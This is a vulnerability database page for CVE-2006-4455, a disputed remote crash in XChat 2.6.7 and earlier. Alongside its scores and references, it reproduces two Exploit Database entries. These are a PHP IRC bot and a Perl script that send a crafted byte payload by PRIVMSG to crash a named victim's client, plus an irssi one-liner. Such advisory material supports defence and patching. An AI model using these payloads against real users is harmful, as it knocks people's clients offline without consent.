CVE-2006-4455 : Detail

CVE-2006-4455

16.92%V3
Network
2006-08-30
13h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service (crash) via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2124

Publication date : 2006-08-06 22h00 +00:00
Author : ratboy
EDB Verified : Yes

<? # another way to test this with irssi/bitchx <below> /str0ke # /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"' ?> <?php // XChat <= 2.6.7 Windows Remote Crash DoS by ratboy // Tested on Windows SP1/SP2 // The following bug was tested on the XChat <= 2.6.7 on Windows SP1/SP2 //Stop the script timing out set_time_limit(0); //Set constants define("SERVER", 'irc.enigmagroup.org'); define("PORT", 6667); define("CHANNEL", "#enigmagroup"); //Set the channel the bot will join here define("NICK", "ratbot"); //Set the bot's nick here define("EXPLOIT", "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"); define("VICTIM", "ratboy"); $socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket $fp = socket_connect($socket, SERVER, PORT); // Connect to the server socket_write($socket,"USER ratboy ratboy ratboy :ratboy\r\n"); // Send the Username to the server socket_write($socket,"NICK ".NICK." \r\n"); // Change our nickname socket_write($socket,"JOIN ".CHANNEL." \r\n"); // Join the channel while($data = @socket_read($socket,2046)) { //read the data echo $data; $cmd = explode(" ", $data); if (strpos($data, "PING :")===0) { socket_write($socket, "PONG :".substr($data, 6)."\r\n"); continue; } if($cmd[1] == "PRIVMSG"){ // Send the exploit right when the channel gets a message then stop the bot socket_write($socket, "PRIVMSG ".VICTIM." :".EXPLOIT."\r\n"); socket_close($socket); } } ?> # milw0rm.com [2006-08-07]
Exploit Database EDB-ID : 2147

Publication date : 2006-08-07 22h00 +00:00
Author : Elo
EDB Verified : Yes

#!/usr/bin/perl # rewritten because perl is more elegant than php # payload taken from original that ratboy submitted use strict; use Net::IRC; my ($nick, $server, $port, $channel, $victim) = @ARGV; my $irc = new Net::IRC; my $connect = $irc -> newconn (Nick => "$nick", Server => "$server", Port => $port, Ircname=> 'whatever') or die "$0: Error\n"; my $payload = "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"; sub on_connect { my $self = shift; $self->join("#".$channel); $self->privmsg($victim, "$payload"); } $connect->add_handler('376', \&on_connect); $irc->start(); # milw0rm.com [2006-08-08]

Products Mentioned

Configuraton 0

Xchat>>Xchat >> Version To (including) 2.6.7

References

http://www.xchat.org/
Tags : x_refsource_MISC
http://www.securityfocus.com/bid/19398
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/2124
Tags : exploit, x_refsource_EXPLOIT-DB
http://marc.info/?l=bugtraq&m=115523184321922&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
https://www.exploit-db.com/exploits/2147
Tags : exploit, x_refsource_EXPLOIT-DB
http://securitytracker.com/id?1016687
Tags : vdb-entry, x_refsource_SECTRACK